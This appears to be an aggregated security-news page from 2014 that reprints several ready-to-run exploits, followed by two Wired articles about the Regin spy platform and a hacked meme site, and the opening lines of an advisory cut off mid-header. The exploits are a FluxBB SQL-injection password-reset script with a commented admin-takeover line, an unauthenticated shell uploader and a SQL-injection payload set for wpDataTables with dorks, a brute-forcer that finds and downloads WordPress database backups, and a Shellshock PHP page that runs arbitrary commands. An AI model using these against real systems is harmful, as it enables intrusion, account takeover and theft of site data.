

FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
# Forum base URL (placeholder host) and the credentials of the low-privilege
# account the script logs in with.  `pwd` is also re-sent as `req_password`
# in stage1's change-email form, so it must be the account's real password.
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test' 
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
# Browser-looking User-Agent sent with every request, and the address the
# stage-2 SMTP listener is bound to ('0.0.0.0' = every local interface; see
# the stage2_smtp((bindip, 25), None) call at the bottom of the script).
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
  """Stage 1: submit *sql* through the change-email form of the logged-in user.

  The fragment is URL-encoded and sent as ``req_new_email`` together with the
  account password; ``uid`` and ``cookie`` are the module globals filled in by
  ``login()``.  Anything longer than 80 characters is refused up front
  (presumably the server-side length limit of the email field -- not verified
  here).  Exits if the forum does not confirm that a mail was sent.
  """
  if len(sql) > 80:
    sys.exit('SQL too long, max 80 chars')
  print "1st stage: %s (%d chars)" % (sql, len(sql))
  r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
  # Success is detected only by a fixed English phrase; a forum running a
  # different language pack would presumably be reported as 'err' even when
  # the request went through.
  if 'An email has been sent to the specified address' not in r:
    sys.exit('err')
 
def stage3(key):
  """Stage 3: open the password-change link carrying the activation *key*
  that stage 2 pulled out of the confirmation mail, and report whether the
  forum accepted it.

  Prints 'success' or 'err' depending on a fixed phrase in the response; no
  other diagnostics are shown.
  """
  print "3rd stage, using key: %s" % key
  r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
  if 'Your password has been updated' in r:
    print 'success'
  else:
    print 'err'
 
class stage2_smtp(smtpd.SMTPServer):
  """Stage 2: minimal SMTP sink that waits for the forum's confirmation mail.

  Each delivered message is decoded and searched for a link containing
  ``&key=``; the first match ends the ``asyncore.loop()`` at module level by
  raising ``asyncore.ExitNow`` with the key as its payload.  Messages without
  such a link are silently dropped.
  """
  def process_message(self, peer, mailfrom, rcpttos, data):
    # Called by smtpd.SMTPServer for every accepted message; `data` is the
    # raw message text.
    print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
    # get_payload(decode=True) undoes any transfer encoding before the regex
    # runs.  NOTE(review): this assumes a single-part message -- for a
    # multipart mail get_payload(decode=True) yields None and re.search would
    # raise instead of returning no match.
    key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
    if key is not None: 
      raise asyncore.ExitNow(key.group(2))
    return
 
def login():
  """Log in with the module-level ``user``/``pwd`` and return ``(uid, cookie)``.

  ``cookie`` is the first ``name=value`` pair of the Set-Cookie header.  The
  code assumes the cookie value has the form ``<uid>%7C...`` and takes the
  text before the first ``%7C`` as the user id.  Any failure (no Set-Cookie,
  unexpected cookie layout, network error) ends the script with one generic
  message -- the bare ``except`` hides the real cause.
  """
  print "logging in"
  r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
  try:
    t = r.info()['set-cookie'].split(';')[0]
    return (t.split('=')[1].split('%7C')[0], t)
  except:
    sys.exit('unable to login, check user/pass')
 
# --- main flow ---------------------------------------------------------------
uid, cookie = login()
 
# A throw-away mail domain is fetched from a third-party service and pasted
# into the payload unmodified: the script neither validates nor escapes what
# that service returns.  Presumably mail for that domain is routed back to the
# caller's IP, which is why the header says the IP must be reachable -- the
# stage-2 listener below only ever sees the mail if it arrives here on port 25.
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
 
#this will change your password to your password :)
# The fragment is the SHA-1 (Python 2 `sha` module) of the current password,
# scoped with a WHERE clause to our own uid; the remainder of the original
# statement is commented out with '#'.
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
 
#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
 
# Stage 2 runs the asyncore loop until process_message raises ExitNow; the
# exception payload (the key) is caught here and handed to stage 3.  Binding
# port 25 typically requires elevated privileges.
try:
  print "2nd stage: waiting for mail"
  server = stage2_smtp((bindip, 25), None)
  asyncore.loop()
except asyncore.ExitNow, key:
  stage3(key)



WordPress wpDataTables 1.5.3 Shell Upload

#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' );
#    add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' );
# 
#
# Issue n.2 (lib/upload/UploadHandler.php)
#
# This php script allows you to upload any type of file
#
# ---------------------------------------------------------------------
#
# Dork google:  inurl:/plugins/wpdatatables
#               inurl:codecanyon-3958969
#               index of "wpdatatables"
#               index of "codecanyon-3958969"
#
# Tested on BackBox 3.x
#
#
# http connection
import urllib, urllib2, sys, re
# Args management
import optparse
# file management
import os, os.path
 
# Check url
def checkurl(url):
    """Return *url* unchanged when it carries an http:// or https:// scheme.

    Any other prefix prints an error and terminates the program with status 1,
    so callers never see a URL without a scheme.
    """
    if url.startswith(("http://", "https://")):
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
 
# Check that the file exists and is readable
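def checkfile(file):
    """Return *file* if it names an existing, readable regular file.

    Otherwise print an error and exit with status 1.  The original test joined
    the two checks with ``and``, so a file that exists but is not readable was
    accepted here and only failed later inside ``open()``; either condition
    alone is now enough to reject the path.
    """
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] ' + file + ' file is missing or not readable')
        sys.exit(1)
    return file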
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
   """Build a multipart/form-data body carrying *payloadname* as the ``files[]`` part.

   The boundary is a fixed string (it has to agree with the Content-Type header
   the caller sends) and the file part is labelled
   ``application/force-download``.  No extra form fields are emitted.  Returns
   the whole body as one CRLF-joined string.
   """
   boundary = '----------lImIt_of_THE_fIle_eW_$'
   crlf = '\r\n'
   extra_fields = {}

   with open(payloadname) as fh:
      contents = fh.read()

   parts = []
   # Plain form fields would go first; none are defined at the moment.
   for name, value in extra_fields.items():
      parts.extend([
         '--' + boundary,
         'Content-Disposition: form-data; name="%s"' % name,
         '',
         value,
      ])

   # The file part, then the closing boundary and a trailing empty line.
   parts.extend([
      '--' + boundary,
      'Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname),
      'Content-Type: application/force-download',
      '',
      contents,
      '--' + boundary + '--',
      '',
   ])
   return crlf.join(parts)
 
# ASCII-art banner, printed with the usage text and again before the upload.
banner = """
   ___ ___               __                                                         
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
  |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
  |:      |                |__|                                                     
  |::.|:. |                                                                         
  `--- ---'                                                                         
         ___ ___       ______         __         _______       __    __                
        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
        |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
        |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
        |:      |__|  |:  1    /                  |:  |                                
        |::.|:. |     |::.. . /                   |::.|                                
        `--- ---'     `------'                    `---'                                
 
                                                        Sh311 Upl04d Vuln3r4b1l1ty 
                                                                <= 1.5.3
 
                                   Written by:
 
                                 Claudio Viviani
 
                              http://www.homelab.it
 
                                 info@homelab.it
                             homelabit@protonmail.ch
 
                        https://www.facebook.com/homelabit
                          https://twitter.com/homelabit
                          https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Command-line handling: target URL and local file are mandatory, the timeout
# is optional.  NOTE: `timeout` is read into a variable below but never passed
# to urlopen(), so the option has no effect as written.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
# The plugin registers the action on the `nopriv` AJAX hook as well (see the
# header), i.e. it is reachable without a WordPress session.
url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file'
 
# The boundary here must be the same string create_body_sh3ll_upl04d() builds
# the body with; the two are kept in sync by hand.
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
bodyupload = create_body_sh3ll_upl04d(payloadname)
 
# content-length is computed from the body explicitly (urllib2 would
# presumably add it as well for a request with data).
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }
 
try:
   req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
   response = urllib2.urlopen(req)
 
   read = response.read()
 
   # A bare "0" is what admin-ajax.php answers when no handler ran (plugin
   # absent or hook not registered); any reply containing "error" is treated
   # as a failed upload.
   if "error" in read or read == "0":
      print("[X] Upload Failed :(")
   else:
      # First "url":"..." value of the JSON reply; the JSON-escaped slashes
      # (\/) are cleaned up by dropping the backslashes before printing.
      backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1)
      print("[!] Shell Uploaded")
      print("[!] Location: "+backdoor_location.replace("\\",""))
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e))



WordPress wpDataTables 1.5.3 SQL Injection

######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from a SQL injection vulnerability
 
The "table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
 
  /**
   * Handler which returns the AJAX response
   */
   function wdt_get_ajax_data(){
     $id = $_GET['table_id']; <------------------- Not Sanitized!
       $table_data = wdt_get_table_by_id( $id );
       $column_data = wdt_get_columns_by_table_id( $id );
       $column_headers = array();
       $column_types = array();
       $column_filtertypes = array();
       $column_inputtypes = array();
       foreach($column_data as $column){
           $column_order[(int)$column->pos] = $column->orig_header;
           if($column->display_header){
             $column_headers[$column->orig_header] = $column->display_header;
           }
           if($column->column_type != 'autodetect'){
             $column_types[$column->orig_header] = $column->column_type;
           }else{
             $column_types[$column->orig_header] = 'string';
           }  
           $column_filtertypes[$column->orig_header] = $column->filter_type;
           $column_inputtypes[$column->orig_header] = $column->input_type;
       }
------------------------
 
(The vulnerable variable is also used in other PHP files)
 
######################
 
# PoC
 
http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
 
# Sqlmap
 
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
 
---
Parameter: table_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=get_wdtable&table_id=1 AND 9029=9029
 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
 
---
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################



WordPress WP-DB-Backup 2.2.4 Backup Theft

#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
# Arguments as actually used below: $1 = target host, $2 = the table-prefix
# part of the dump file name (the usage line above mentions only the first).
# Phase 1 probes every backup-<5 hex chars>/ directory, i.e. 16^5 = 1,048,576
# HEAD requests; phase 2 up to 1000 candidate .sql names inside the directory
# found.  A scan of that volume stands out clearly in web server access logs.
 
DATE="20141031"; #Date to search   (set here but not referenced anywhere below)
 
# Generate the candidate list once: every 5-character lowercase hex string.
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
      for (y = 0; y < 16; y++)
    for (z = 0; z < 16; z++)
        for (a = 0; a < 16; a++)
      for (b = 0; b < 16; b++)
          printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
            string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi
 
# Phase 1: one HEAD request per candidate directory; the first hit is
# remembered in found.txt so a re-run can skip straight to phase 2.
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
  for x in `cat rainbow`; do 
                CPATH="http://$1/wp-content/backup-$x/";
     # `grep 200` matches the digits anywhere in the response headers, not
     # only in the status line (e.g. a Content-Length containing 200).
     RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo "[+] Location $CPATH Found";
                 echo "[+] Received $RESULT";
                 echo $x > found.txt;
                 break; #break here
  fi;
                 echo -n "Percent Done: ";
                 Y=`echo "scale=6;($Z/$K)*100"|bc`;
                 echo -n $Y
                 echo "%";
                 Z=$(( $Z + 1 ));
done
else
# Directory suffix saved by an earlier run.
x=`cat found.txt`;
fi
 
# Now that we have the directory lets try to locate the database backup file.
# NOTE: Z is not reset here (and is never set at all when found.txt already
# existed), so the percentage printed in this loop is unreliable.
 
K=999;
for y in `seq -w 0 999`; do 
                CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
     RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo "[+] Database backup $CPATH Found";
                 echo "[+] Received $RESULT";
                 wget $CPATH
                 exit; #break here
  fi;
                 echo -n "Percent Done: ";
                 Y=`echo "scale=2;($Z/$K)*100"|bc`;
                 echo -n $Y
                 echo "%";
                 Z=$(( $Z + 1 ));
done



PHP 5.x / Bash Shellshock Proof Of Concept

<?php
 
// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
 
// How the demonstration works: the exported variable starts with "() { :;};",
// which an unpatched bash parses as a function definition on start-up and then
// goes on to execute the text that follows it.  mail() spawns the system
// sendmail binary (here with the extra "-bv" parameter) and the child inherits
// the web server's environment, so the variable reaches a bash process whenever
// the spawn goes through /bin/sh and that shell is bash.  Command output is
// redirected into a temp file, echoed back and the file is removed.
// Mitigation: a bash build carrying the CVE-2014-6271 fix no longer imports
// functions from arbitrary environment variables.  Note that the "cmd" value
// is taken from the request without any validation, so this page is itself an
// unauthenticated command-execution endpoint wherever it is left deployed.
if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
  $file=tempnam("/tmp", "xpl");
  putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
  mail("xpl@localhost", "", "", "", "-bv");
  echo file_get_contents($file);
  unlink($file);
}
 
?>



Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian telecom. In this case, too, the attack was sophisticated and complex. According to published news reports and documents leaked by Edward Snowden, the attackers targeted system administrators working for Belgacom and used their credentials to gain access to routers controlling the telecom’s cellular network. Belgacom publicly acknowledged the hack, but has never provided details about the breach.

Then five months after that announcement, news of another high-profile breach emerged—this one another sophisticated hack targeting prominent Belgian cryptographer Jean-Jacques Quisquater.

Now it appears that security researchers have found the massive digital spy tool used in all three attacks. Dubbed “Regin” by Microsoft, more than a hundred victims have been found to date, but there are likely many others still unknown. That’s because the espionage tool—a malicious platform capable of taking over entire networks and infrastructures—has been around since at least 2008, possibly even earlier, and is built to remain stealth on a system for years.

The threat has been known since at least 2011, around the time the EU was hacked and some of the attack files made their way to Microsoft, who added detection for the component to its security software. Researchers with Kaspersky Lab only began tracking the threat in 2012, collecting bits and pieces of the massive threat. Symantec began investigating it in 2013 after some of its customers were infected. Putting together information from each, it’s clear the platform is highly complex and modulated and can be customized with a wide range of capabilities depending on the target and the attackers’ needs. Researchers have found 50 payloads so far for stealing files and other data, but have evidence that still more exist.

“It’s a threat that everyone has detected for some time, but no one has exposed [until now],” says Eric Chien, technical director of Symantec’s Security Technology and Response division.

The Most Sophisticated Spy Tool Yet

The researchers have no doubt that Regin is a nation-state tool and are calling it the most sophisticated espionage machine uncovered to date—more complex even than the massive Flame platform, uncovered by Kaspersky and Symantec in 2012 and crafted by the same team who created Stuxnet.

“In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless,” writes Symantec in its report about Regin.

Though no one is willing to speculate on the record about Regin’s source, news reports about the Belgacom and Quisquater hacks pointed a finger at GCHQ and the NSA. Kaspersky confirms that Quisquater was infected with Regin, and other researchers familiar with the Belgacom attack have told WIRED that the description of Regin fits the malware that targeted the telecom, though the malicious files used in that attack were given a different name, based on something investigators found inside the platform’s main file.

Victims are located in multiple countries. Kaspersky has found them in Algeria, Afghanistan, Belgium, Brazil, Fiji, Germany, Iran, India, Malaysia, Syria, Pakistan, Russia and the small Pacific island nation of Kiribati. The majority of victims Symantec has tracked are located in Russia and Saudi Arabia.

Targets include entire networks, not just individuals, among them telecoms in multiple countries, as well as government agencies, research institutes and academics (particularly those doing advanced mathematics and cryptography, like Quisquater). Symantec has also found hotels infected. These are likely targeted for their reservation systems, which can provide valuable intelligence about visiting guests.

But perhaps the most significant aspect of Regin is its ability to target GSM base stations of cellular networks. The malicious arsenal includes a payload that Kaspersky says was used in 2008 to steal the usernames and passwords of system administrators of a telecom somewhere in the Middle East. Armed with these credentials, the attackers would have been able to access GSM base station controllers—the part of a cellular network that controls transceiver stations—to manipulate the systems or even install malicious code to monitor cellular traffic. They could also conceivably have shut down the cellular network—for example, during an invasion of the country or other unrest.

Kaspersky won’t identify the telecom or country where this GSM attack occurred, but suggests it’s either Afghanistan, Iran, Syria or Pakistan, as out of Kaspersky’s list of countries with Regin infections, only these four are in the region popularly considered the Middle East. Afghanistan stands out among the four, having been the only one cited in recent news stories about government hacking of GSM networks. Although most authorities would place it in South Asia, it is often popularly identified as being part of the Middle East.

Earlier this year, news reports based on documents leaked by Edward Snowden revealed two NSA operations codenamed MYSTIC and SOMALGET that involved hijacking the mobile network of several countries to collect metadata on every mobile call to and from these nations and, in at least two countries, to covertly record and store the full audio of calls. The countries where metadata was collected were identified as Mexico, Kenya, the Philippines and the island nation of the Bahamas. Countries where full audio was being recorded were identified as the Bahamas and Afghanistan.
The Path to Discovery

The Regin platform made its first public appearance in 2009 when someone uploaded components of the tool to the VirusTotal web site. VirusTotal is a free web site that aggregates dozens of anti-virus scanners. Researchers, and anyone else who finds a suspicious file on their system, can upload the file to the site to see if the scanners consider it malicious.

No one apparently noticed this upload in 2009, however. It wasn’t until March 9, 2011 that Microsoft appeared to take note, around the time that more files were uploaded to VirusTotal, and announced that the company had added detection for a trojan called Regin.A to its security software. The following day, it made the same announcement about a variant called Regin.B. Some in the security community believe the files uploaded to VirusTotal in 2011 might have come from the European Commission or from a security firm hired to investigate its breach.

Guido Vervaet, the EU Commission’s director of security who helped investigate the breach, wouldn’t discuss it other than to say it was “quite” extensive and very sophisticated, with a “complex architecture.” He says the attackers used a zero-day exploit to get in but wouldn’t say what vulnerability they attacked. The attack was uncovered by system administrators only when systems began malfunctioning. Asked if the attackers used the same malware that struck Belgacom, Vervaet couldn’t say for sure. “It was not one piece of software; it was an architecture [that] was not just one component but a series of elements working together. We have analyzed the architecture of the attack, which was quite sophisticated and similar to other cases that we know of in other organizations” but internally they were unable to come to any conclusion “that it was the same attack or the same wrongdoers.”

Vervaet wouldn’t say when the intrusion began or how long the invaders had been in the EU network, but documents released by Snowden last year discussed NSA operations that had targeted the EU Commission and Council. Those documents were dated 2010.

There are currently two known versions of the Regin platform in the wild. Version 1.0 dates back to at least 2008 but disappeared in 2011 the same year Microsoft released signatures to detect its trojan. Version 2.0 popped up in 2013, though it may have been used earlier than this. Researchers have found some Regin files with timestamps dating to 2003 and 2006, though it’s not clear if the timestamps are accurate.

Liam O’Murchu, senior manager in Symantec’s threat response group, says the threat landscape in 2008 was much different than it is today and this likely contributed to Regin remaining stealth for so long. “I don’t think we realized attackers were working on this level until we saw things like Stuxnet and Duqu and we realized they’d been on this level for quite some time.” Those discoveries prompted researchers to begin looking for threats in different ways.

It’s unclear how the first infections occur. Neither Symantec nor Kaspersky has uncovered a dropper component (a phishing email containing an exploit that drops the malware onto a machine or entices victims to click on a malicious link), but based on evidence in one attack from 2011, Symantec thinks the attackers might have used a zero-day vulnerability in Yahoo Instant Messenger. But Chien says the attackers probably used multiple techniques to get into different environments. Reports about the hack of Belgacom describe a more sophisticated man-in-the-middle technique that involved using a rogue server to hijack the browser of Belgacom system administrators and redirect them to web pages the attackers controlled that infected their machines with malware.

Regardless of how it first gets into a machine, the Regin attack unfolds in five stages. Stages one through three load the attack and configure its architecture, while stages four and five launch the payloads. Among the payload options are a remote access trojan that gives the attackers backdoor access to infected systems, a keystroke logger and clip board sniffer, a password sniffer, modules to collect information about USB devices connected to the infected system, and an email extraction module called U_STARBUCKS. Regin can also scan for deleted files and retrieve them.

The execution of components is orchestrated by an elaborate component that researchers have dubbed the “conductor.” This is “the brain of the whole platform,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis Team.

Regin uses a nested decrypting technique, decrypting itself in stages, with the key for decrypting each component in the component that precedes it. This made it difficult for researchers to examine the threat in the beginning when they didn’t have all of the components and all of the keys.

Regin also uses an unusual technique in some cases to hide its data, by storing it in the Extended Attributes portion of Windows. Extended Attributes is a storage area for metadata associated with files and directories, such as when a file was created or last altered or whether an executable program was downloaded from the internet (and therefore needs a prompt warning users before opening). Extended Attributes limits the size of data blocks it can store, so Regin splits the data it wants to store into separate encrypted chunks to hide them. When it needs to use this data, the conductor links the chunks together so they can execute like a single file.

The attackers also use a complex communication structure to manage the large scope of network-wide infections. Instead of communicating directly with the attackers’ command servers, each system talks only to other machines on the network and with a single node that acts as a hub to communicate with command servers. This reduces the amount of traffic leaving the network and the number of machines communicating with a strange server outside the network, which can draw suspicion. It also allows the attackers to communicate with systems inside the organization that might not even be connected to the internet.
‘It’s Totally Crazy’: The Middle-Eastern Hacks

The most elaborate and extensive infection Kaspersky saw that used this technique occurred in a Middle Eastern country the researchers decline to name. They call the infection “mind-blowing” and say in their report that it consisted of an elaborate web of networks the attackers infected and then linked together. These include networks for the office of the president of the country, a research center, an educational institute that from its name appears to be a mathematics institute, and a bank. In this case, instead of having each of the infected networks communicate with the attackers’s command server individually, the attackers set up an elaborate covert communication web between them so that commands and information passed between them as if through a peer-to-peer network. All of the infected networks then interfaced with one system at the educational institute, which served as a hub for communicating with the attackers.

“It’s totally crazy,” says Raiu. “The idea is to have one single control mechanism for the whole country so they can just run one command, and that command is replicated between all the members on the peer-to-peer network.”

The connections between infected machines and networks are encrypted, with each infected node using a public and private key to encrypt traffic exchanged between them.

Kaspersky refers to the educational institute as the “Magnet of Threats” because they found all sorts of other advanced threats infesting its network—including the well-known Mask malware and Turla—all co-existing peacefully with Regin.

But on par with this attack was one that occurred in another Middle East country against the GSM network of a large, unidentified telecom. The Kaspersky researchers say they found what appears to be an activity log the attackers used to collect commands and login credentials for one of the telecom’s GSM base station controllers. The log, about 70 KB in size, contains hundreds of commands sent to the base station controller between April 25 and May 27 of 2008. It’s unclear how many of the commands were sent by telecom administrators or by the attackers themselves in an attempt to control base stations.

The commands, which Kaspersky identified as Ericsson OSS MML commands, are used for checking the software version on a base station controller, retrieving a list of the call forwarding settings for the mobile station, enabling call forwarding, listing the transceiver route for a particular cell tower, activating and deactivating cell towers in the GSM network, and adding frequencies to the active list of frequencies used by the network. The log shows commands going to 136 different GSM cell sites—cell sites with names like prn021a, gzn010a, wdk004, and kbl027a. In addition to commands, the log also shows usernames and passwords for the telecom’s engineer accounts.

“They found a computer that manages a base station controller, and that base station controller is able to reach out to hundreds of cells,” says Raiu. He says there are two or three GSM operators in the targeted country and the one the attackers targeted is the largest. He doesn’t know if the others were infected as well.

Both of these infections—targeting the GSM network and the presidential network—appear to be ongoing. As news of the Regin attack spreads and more security firms add detection for it to their tools, the number of victims uncovered will no doubt grow.

http://www.wired.com/2014/11/mysteries-of-the-malware-regin/



Feminist Hacker Barbie Is Just What Our Little Girls Need

Feminist Hacker Barbie Is Just What Our Little Girls Need

There’s an illustrated book called “Barbie: I Can be a Computer Engineer,” and everyone we know hated it.

Packed with “Over 50 Stickers!,” it dreams up a computer engineering version of Barbie who seems better at taking praise for other people’s work than doing any actual coding. It prompted some serious outrage on the net this week because Barbie the computer engineer says things like “I’m only creating the design ideas” and “I’ll need Steven’s and Brian’s help to turn it into a game.” She also infects her sister’s computer, leans on these two guy friends to fix the problem, and then takes credit for their work. Bad Barbie!

Says blogger Pamela Ribon: “It’s a perfect example of the way women and girls are perceived to ‘understand’ the tech world, and how frustrating it can be when nobody believes this is how we’re treated.”

But the internet has fallen in love with Feminist Hacker Barbie. She’s the brainchild of Kathleen Tuite, an independent computer programmer based near Santa Cruz, California, who spent a half-day this week putting together a website where people could re-caption the original book, hacking it to fix all of its pastel-hued problems.

Tuite, who until recently was a University of Washington graduate student studying crowdsourcing, says she created the site out of disappointment and frustration with the official Barbie book. In the past few days, her Feminist Hacker Barbie has blossomed into a full-blown and extremely funny internet meme with thousands of captions, many of which we think would make great fodder for a real Barbie engineering movie.

These captions work so well because of the sheer ridiculousness of the original Barbie images. In one of them, Barbie inexplicably sits in front of three computers, her hand on two different machines simultaneously. About 2,700 of the captions were uploaded to Tuite’s website—and then someone discovered a bug in the Django code Tuite used to build the site. In short order, Feminist Hacker Barbie got hacked.

At first, someone started uploading photos of Free Software Foundation advocate Richard Stallman. After that, came the porn. So Tuite pulled the plug on the uploads, but folks are free to create their own images and captions. And those have been popping up all over Twitter and Facebook for the past few days.

Tuite’s favorite so far is a picture from the book that includes a sample of the buggy code from her website—a sort of meta-cartoon, written as though Computer Engineer Barbie herself had unearthed the offending vulnerability.

Fonte: http://www.wired.com/2014/11/feminist-hacker-barbie-just-little-girls-need/


Supr Shopsystem 5.1.0 Cross Site Scripting

Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
Release Date:
=============
2014-11-07
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
Common Vulnerability Scoring System:
====================================
3.1
 
Product & Service Introduction:
===============================
